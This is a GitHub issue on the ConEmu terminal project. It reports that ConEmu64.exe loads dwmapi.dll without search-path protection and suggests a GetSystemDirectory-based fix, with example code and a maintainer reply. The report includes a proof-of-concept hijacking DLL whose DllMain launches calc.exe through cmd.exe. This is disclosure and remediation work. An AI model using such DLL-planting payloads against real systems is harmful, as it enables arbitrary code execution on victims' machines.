Maximus5 / ConEmu

Customizable Windows terminal with tabs, splits, quake-style, hotkeys and more
https://conemu.github.io/
BSD 3-Clause "New" or "Revised" License

Attacker can achieve arbitrary code execution using a DLL preloading attack. #2556

Open comalmot opened 7 months ago

comalmot commented 7 months ago

Versions

ConEmu build: v23.07.24 x64 (Portable Version: ConEmuPack.230724.7z)
OS version: Windows 11 Pro x64 (Build 22621)
Used shell version (Far Manager, git-bash, cmd, powershell, cygwin, whatever): Explorer.exe

Problem description

When ConEmu64.exe is executed, the CDwmHelper::InitDwm() method is invoked ( https://github.com/Maximus5/ConEmu/blob/master/src/ConEmu/DwmHelper.cpp ),

and in this method, when loading dwmapi.dll, the LoadLibrary call has no flag to prevent DLL preloading.

https://github.com/Maximus5/ConEmu/blob/740b09c363cb16fbb730d72c53eaca1c530a016e/src/ConEmu/DwmHelper.cpp#L111

        mh_DwmApi = LoadLibrary(_T("dwmapi.dll"));

So an attacker can place a malicious DLL file (named dwmapi.dll) in the directory where ConEmuPack is installed, and achieve arbitrary code execution.

Steps to reproduce

  1. Generate a malicious DLL file:

        // Visual Studio "Dynamic-Link Library" project template headers
        #include "pch.h"
        #include "framework.h"
        #include <Windows.h>

        // Entry point called by the loader when the DLL is mapped into a process.
        BOOL APIENTRY DllMain( HMODULE hModule,
                               DWORD  ul_reason_for_call,
                               LPVOID lpReserved
                             )
        {
            switch (ul_reason_for_call)
            {
            case DLL_PROCESS_ATTACH:
                // Runs as soon as ConEmu64.exe loads this file as "dwmapi.dll"
                WinExec((LPSTR)"cmd.exe /c calc.exe", SW_SHOW);
            case DLL_THREAD_ATTACH:
            case DLL_THREAD_DETACH:
            case DLL_PROCESS_DETACH:
                break;
            }
            return TRUE;
        }

This code launches calc.exe.

  2. Put it in the directory where ConEmuPack is installed, as dwmapi.dll.

[screenshot]

  3. Just click ConEmu64.exe.

[screenshot]

Actual results

ConEmu.exe and ConEmu64.exe must not be affected by DLL preloading.

Expected results

ConEmu.exe and ConEmu64.exe are affected by DLL preloading.

Additional files

PoC: 2023-11-22 23-40-42

How to Solve

https://support.microsoft.com/en-au/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1

We can use an absolute path: the GetSystemDirectory() function can be used to combine the system directory path with the DLL file name (in this case, dwmapi.dll) to defend against it.

Sorry for my bad English 😢
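
Added example (not ConEmu's code) of the fix suggested in the post above: resolve the DLL to the System32 directory with GetSystemDirectory and load it by absolute path, so the application directory is never consulted. The names BuildSystemDllPath and LoadSystemDll are assumptions; the path-joining helper is kept free of Win32 calls so it can be checked off Windows, while the loader itself is Windows-only.

```cpp
#include <string>

// Join the system directory and a bare DLL file name into an absolute path.
// Returns an empty string if the name is empty or smuggles in a directory
// component (e.g. "..\\evil\\dwmapi.dll"), so the result always stays
// inside the system directory.
std::wstring BuildSystemDllPath(const std::wstring& sysDir, const std::wstring& dllName)
{
    if (dllName.empty() || dllName.find_first_of(L"\\/") != std::wstring::npos)
        return std::wstring();

    std::wstring path = sysDir;
    if (!path.empty() && path.back() != L'\\')
        path += L'\\';
    return path + dllName;
}

#ifdef _WIN32
#include <windows.h>

// Load `dllName` (e.g. L"dwmapi.dll") from %SystemRoot%\System32 only.
// Unlike LoadLibrary(_T("dwmapi.dll")), a fully qualified path disables the
// default search order, so a same-named file next to ConEmu64.exe is ignored.
// Returns NULL on failure, matching LoadLibrary's contract.
HMODULE LoadSystemDll(const wchar_t* dllName)
{
    wchar_t sysDir[MAX_PATH];
    UINT len = GetSystemDirectoryW(sysDir, MAX_PATH);
    if (len == 0 || len >= MAX_PATH)          // API failure or buffer too small
        return NULL;

    std::wstring fullPath = BuildSystemDllPath(sysDir, dllName);
    if (fullPath.empty())
        return NULL;

    // On Windows 8+ (or Windows 7 with KB2533623) LoadLibraryExW with
    // LOAD_LIBRARY_SEARCH_SYSTEM32 and the bare name is an equivalent option.
    return LoadLibraryExW(fullPath.c_str(), NULL, 0);
}

// Hypothetical caller in the spirit of CDwmHelper::InitDwm:
//   HMODULE mh_DwmApi = LoadSystemDll(L"dwmapi.dll");
//   if (!mh_DwmApi) { /* DWM unavailable: continue without it */ }
#endif
```

Note that the absolute path protects only this one load; dwmapi.dll's own dependencies are still resolved by the loader's normal rules.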

Maximus5 commented 7 months ago

Thank you for raising the issue. I'll address this problem ASAP